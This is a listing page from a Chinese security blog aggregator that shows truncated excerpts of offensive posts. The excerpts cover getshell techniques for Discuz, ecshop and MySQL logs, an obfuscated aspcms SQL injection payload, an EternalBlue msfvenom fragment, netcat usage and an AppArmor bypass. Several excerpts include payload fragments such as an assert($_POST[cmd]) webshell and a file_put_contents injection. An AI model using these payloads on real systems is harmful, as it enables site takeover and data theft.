安全博客 - 第 115 | CN-SEC 中文网

SQLmap udf dll 解码

SQLmap udf dll 解码文件. udf/mysql/windows/32/lib_mysqludf_sys.dll_ 用 extra/cloak 下的 cloak.py 解码. cloak...

12月15日安全博客44 views评论

阅读全文

MS17-010 Attack bat

需要提取 NSA 工具包里的 Eternalblue.exe 和 Doublepulsar.exe 还有一堆必备的 xml 文件. 生成 dll. msfvenom -p windows/x64/me...

12月15日安全博客46 views评论

阅读全文

netcat 使用技巧

netcat 是一个用于 TCP/UDP 连接和监听的 linux 工具, 主要用于网络传输及调试领域. 聊天室Server: nc -l -p port Client: nc ip port 此时在...

12月15日安全博客24 views评论

阅读全文

安全博客

discuz 后台 getshell

适用于 Discuz X3.3 及之前版本站长 - Ucenter 设置 - Ucenter 应用 ID 填入代码 123');file_put_contents('a.php','<?php...

12月15日65 views评论

阅读全文

Git 学习笔记

Git 学习笔记基本操作初始化仓库 git init 添加文件到暂存区 git add file 提交到版本库 git commit -m 'text' 比较文件 git diff file 日志查...

12月14日安全博客41 views评论

阅读全文

星外虚拟主机跨目录

列目录 + 文件读取 + 文件打包可执行文件 c:\windows\7i24IISLOG.exe c:\windows\7i24IISLOG2.exe c:\windows\7i24IISLOG3....

12月14日安全博客33 views评论

阅读全文

MSSQL 显错注入

MSSQL 显错注入听说 mssql 不同版本的注入语句不同这里的版本是 mssql 2008. db_name() 当前数据库 user 当前用户 @@version 版本爆库语句 id=1 ...

12月14日安全博客44 views评论

阅读全文

MySQL Log Getshell

require: root权限. 网站物理路径. 文件位置未被限制. set global general_log = on; set global general_log_file = '...

12月14日安全博客30 views评论

阅读全文

安全博客

ecshop 后台 getshell

ecshop 后台 getshell 模板管理 - 语言项编辑下拉栏选择 user.php 搜索用户信息后面加上代码 ${${assert($_POST[cmd])}} 确认修改连接根目录下...

12月14日37 views评论

阅读全文

aspcms SQL 注入

亲测过百度云加速 payload /plug/comment/commentList.asp?id=0 unmasterion semasterlect top 1 UserID,GroupID,Lo...

12月14日安全博客30 views评论

阅读全文

Linux Capabilities 入门教程：进阶实战篇

原文链接：Linux Capabilities In Practice Linux capabilities 非常晦涩难懂，为此我专门写了两篇文章来解释其基本原理和设置方法。本文将会继续研究 Lin...

12月14日安全博客40 views评论

阅读全文

Apparmor的绕过

0x00 简介什么是AppArmor？AppArmor是一项安全功能，可以在许多Linux发行版中找到。SLES（SUSE Linux Enterprise Server），openSUSE和Ubu...

12月14日安全博客9 views评论

阅读全文

SQLmap udf dll 解码

MS17-010 Attack bat

netcat 使用技巧

discuz 后台 getshell

Git 学习笔记

星外虚拟主机跨目录

MSSQL 显错注入

MySQL Log Getshell

ecshop 后台 getshell

aspcms SQL 注入

Linux Capabilities 入门教程：进阶实战篇

Apparmor的绕过

在线咨询

微信